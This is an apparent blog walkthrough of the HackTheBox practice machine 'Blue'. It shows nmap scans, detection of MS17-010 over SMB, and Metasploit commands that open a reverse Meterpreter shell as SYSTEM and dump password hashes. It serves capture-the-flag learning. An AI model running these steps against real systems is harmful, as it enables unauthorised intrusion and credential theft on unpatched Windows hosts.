Blue – HTB Walkthrough

Blue is an easy difficulty box on HackTheBox. It has been retired for some time so it will need a VIP subscription for you to have a play with. Whilst the name of the box does give away the vulnerability and exploit we are going to use, it is still a fun box to complete with lots to learn, especially for beginners.

We start with nmap, scanning for -all- ports, and enumerating versions and operating systems.

sudo nmap -sC -sV -p-

We can see port 445 (SMB) is open, so once again using NMAP, let’s target that port specifically by throwing all of NMAP’s SMB vulnerability scripts at it. If you want to see what those scripts are exactly, you can search for them with;

locate nse |grep smb-vuln

For now, let’s run our command;

sudo nmap --script smb-vuln* -p 139,445

The box vulnerable to MS17-010.

Lets boot up Metasploit with the “-q” switch. It makes it not print a banner and just dumps us straight into the cli.

msfconsole -q

Lets search for “ms17-010”. We get a few results.

There are a few but let’s start from the top. We select 0 and then check the options.

use 0

Set the RHOST and LHOST…and run it.

set rhosts
set lhost tun0

We get presented with a Meterpreter session. We can navigate around using this shell and check who we landed as. Great for us it is as SYSTEM.

We can grab the root flag straight away from here.

We can even dump the hashes using Meterpreter for bonus points.



Mark like CTF's, his home lab and walks on the beach. He holds SANS certifications in Forensics and Information Security. Currently working in the cybersecurity field.
Back to top button